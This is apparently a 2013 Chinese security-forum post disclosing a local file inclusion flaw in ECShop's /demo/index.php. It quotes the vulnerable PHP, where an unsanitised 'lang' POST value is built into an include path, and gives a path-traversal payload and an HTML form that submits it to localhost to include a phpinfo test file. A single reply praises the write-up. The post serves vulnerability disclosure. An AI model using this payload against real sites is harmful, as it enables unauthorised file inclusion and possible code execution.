查看: 13040|回复: 1

ECShop网店系统最新版本地包含漏洞

[复制链接]
发表于 2013-8-28 09:55:04 | 显示全部楼层 |阅读模式
这个洞,其实我在2012年1月的时候看ecshop就分析出来过,当初由于感觉鸡肋就没怎么放出来。刚下了个官网最新版的,没想到还存在。
漏洞文件在:/demo/index.php

  1. if (!empty($_POST['lang'])) //如果不为空
  2. {
  3. $lang_charset = explode('_', $_POST['lang']); //_分割
  4. $updater_lang = $lang_charset[0].'_'.$lang_charset[1];
  5. $ec_charset = $lang_charset[2]; //我们要控制的。
  6. }
  7. .
  8. .
  9. .
  10. /* 加载升级程序所使用的语言包 */
  11. $updater_lang_package_path = ROOT_PATH . 'demo/languages/' . $updater_lang . '_' . $ec_charset .'.php'; //成功进行控制
  12. if (file_exists($updater_lang_package_path))
  13. {
  14. include_once($updater_lang_package_path); //存在就包含。
  15. $smarty->assign('lang', $_LANG);
  16. }
  17. else
  18. {
  19. die('Can\'t find language package!');
  20. }
复制代码
为了方便测试,我在本地网站根目录下建立一个1.php
代码如下:

  1. <?php
  2. Phpinfo();
  3. ?>
复制代码
然后利用如下:
POST提交
  1. lang=123_123_1/../../../1
复制代码
成功包含 根目录下1.php
20130608234405.jpg
由于本机,搭建环境出了个问题,这个是借别人的图。。应该为post提交,这个漏洞鸡肋之处在于,魔术引号,后面貌似不能%00。
利用代码。保存为html。

  1. <font face="宋体 "><code id="code2"> <html>
  2. <body>
  3. <form action="http://127.0.0.1/demo/index.php" method="post"
  4. enctype="multipart/form-data">
  5. <input type="text" name="lang" />
  6. <input type="submit" name="submit" value="Submit" />
  7. </form>
  8. </body>
  9. </html></code></font>
复制代码
作者:风之传说 》》90sec
回复

使用道具 举报

发表于 2013-9-7 18:50:37 | 显示全部楼层
分析的精明 学习了
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-5-1 01:34 , Processed in 0.096651 second(s), 24 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部